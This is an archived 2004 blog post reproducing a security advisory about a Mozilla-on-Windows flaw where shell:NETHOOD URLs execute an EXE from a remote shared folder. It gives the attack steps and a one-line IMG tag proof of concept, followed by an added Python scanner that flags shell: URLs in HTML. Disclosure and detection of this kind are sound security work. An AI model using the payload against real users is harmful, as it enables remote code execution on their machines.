QODS ec

Saturday, July 10, 2004

SEC: MOZILLA: SHELL can execute remote EXE program

SUBJ: MOZILLA: SHELL can execute remote EXE program
DATE: 2004/07/09
FROM: Liu Die Yu
############################################################
[START] Advisory
############################################################

COPYRIGHT
---------
This Advisory is Copyright (c) 2004 "Liu Die Yu".
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the
author's written permission.
( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709

PROCESS
-------
VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
"shell:NETHOOD"

AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.

REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.

WINDOWS supports "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research, and Cheng Peng Su for his
original discovery.

liudieyu

http://umbrella.name

############################################################
[START] PROOF OF CONCEPT
############################################################


[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]
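
A defensive check for the pattern described in this advisory, as an added example that is not part of the original advisory or of this blog post: a Python scanner, of the kind a mail or proxy content filter might run, that flags HTML attributes whose URL uses the `shell:` scheme. The attribute list, the function and class names and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Attributes whose value a browser treats as a URL to load or navigate to
# (an assumed, non-exhaustive list for this example).
URL_ATTRS = {"src", "href", "data", "action", "background"}
BLOCKED_SCHEMES = {"shell"}  # the scheme this advisory is about

def url_scheme(value):
    """Return the lowercased URL scheme of an attribute value, or None."""
    # URL parsers drop surrounding whitespace and embedded tab/CR/LF,
    # so normalise the same way before looking at the scheme.
    cleaned = value.strip()
    for ch in "\t\r\n":
        cleaned = cleaned.replace(ch, "")
    head, sep, _ = cleaned.partition(":")
    if not sep or not head or not head[0].isalpha():
        return None
    if not all(c.isalnum() or c in "+-." for c in head):
        return None
    return head.lower()

class ShellUrlFinder(HTMLParser):
    """Collects (tag, attribute, value) for every blocked-scheme URL."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases names and decodes character references.
        for name, value in attrs:
            if value and name in URL_ATTRS and url_scheme(value) in BLOCKED_SCHEMES:
                self.findings.append((tag, name, value))

def find_shell_urls(html):
    finder = ShellUrlFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample markup; the second line reuses the URL from the advisory.
SAMPLE = (
    '<p><img src="logo.png"></p>\n'
    '<IMG SRC="shell:NETHOOD\\shared on X-6487ohu4s6x0p\\fileid.exe">\n'
    '<a href=" &#83;HELL:NETHOOD\\x">entity-encoded scheme</a>\n'
    '<a href="http://example.org/?q=shell:x">not a shell: URL</a>\n'
)

if __name__ == "__main__":
    for tag, attr, value in find_shell_urls(SAMPLE):
        print(f"blocked: <{tag} {attr}={value!r}>")
```

The scheme is compared after decoding character references and normalising case and whitespace, so mixed-case and entity-encoded spellings of `shell:` are flagged while a `shell:` substring inside an ordinary `http:` URL is not.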
